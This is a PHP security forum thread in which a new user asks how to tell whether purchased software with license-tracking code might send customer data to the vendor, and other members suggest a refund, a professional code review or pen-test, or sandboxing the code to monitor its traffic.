Privacy leaks(?)

Discussions of secure PHP coding. Security in software is important, so don't be afraid to ask. And when answering: be anal. Nitpick. No security vulnerability is too small.

Moderator: General Moderators

Post Reply
jr_barnes1980
Forum Newbie
Posts: 2
Joined: Tue Jan 23, 2007 8:48 pm

Privacy leaks(?)

Post by jr_barnes1980 »

Hello folks. I'm very new to PHP but it seems to be a pretty cool coding system.

Here is my problem: I purchased a program written in php, but failed to read their EULA which says they have written coding into the software that tracks where it is located. They say this is so they can ensure that it is only used on one site - since I only purchased one license. That, per se, isn't a huge deal really. I'm not a thief or I wouldn't have paid for the software. What concerns me is "What if they have written in other code that compromises my potential customers private information?"

Since PHP is new to me can someone give me an idea of what coding I might look for to ensure that private information isn't sent back to their server?

Thank you.

JRB
User avatar
Kieran Huggins
DevNet Master
Posts: 3635
Joined: Wed Dec 06, 2006 4:14 pm
Location: Toronto, Canada
Contact:

Post by Kieran Huggins »

If you don't feel confident, don't use the software. Ask for a refund.
User avatar
Mordred
DevNet Resident
Posts: 1579
Joined: Sun Sep 03, 2006 5:19 am
Location: Sofia, Bulgaria

Post by Mordred »

"What if they have written in other code that compromises my potential customers private information?"
This (or worse) is valid for every application you use. If it were open source, and mature enough, the community behind it would have most likely weeded out most security problems, intentionally introduced or not. As it is, you have the option of paying for a pen-test or - if the code is available - a code review. This should be done by a competent professional, you as a PHP newbie (no offense) have little chance in finding all the potential problems - check the obfuscated PHP code contenst in the general forum AND the numerous security and code reviews done around here.
jr_barnes1980
Forum Newbie
Posts: 2
Joined: Tue Jan 23, 2007 8:48 pm

Pen-Test

Post by jr_barnes1980 »

No offense taken Mordred. Thanks for the advise. I considered going to the local university's computer department and seeing if one of their computer science majors could look at it for me, but they don't have any classes on PHP. They do have classes on Java, C++ and a few other languages; how close to PHP do these languages resemble and would they be able to track it down. Any suggestions as to where I can look to find someone that would know what they are looking for and can tell me if the software is compromised?

Another idea I had was to use the search function on Windows and look for words in the files that might hint at a backdoor into it - the problem is that I don't know what type of coding to look for - any suggestions?

Thanks for the help folks. Any other suggestions will be greatly appreciated.

JRB
User avatar
Kieran Huggins
DevNet Master
Posts: 3635
Joined: Wed Dec 06, 2006 4:14 pm
Location: Toronto, Canada
Contact:

Post by Kieran Huggins »

It's probably well buried to avoid detection.

I figure it boils down to this: You either trust them or you don't. If you don't trust them, don't run their code. Period.
User avatar
feyd
Neighborhood Spidermoddy
Posts: 31559
Joined: Mon Mar 29, 2004 3:24 pm
Location: Bothell, Washington, USA

Post by feyd »

You could always set up their code in a sandbox and monitor the communications the box attempts to send to other resources.. but if you're getting into that, it's probably better (and less time consuming) to use another, more trustworthy, product.
Post Reply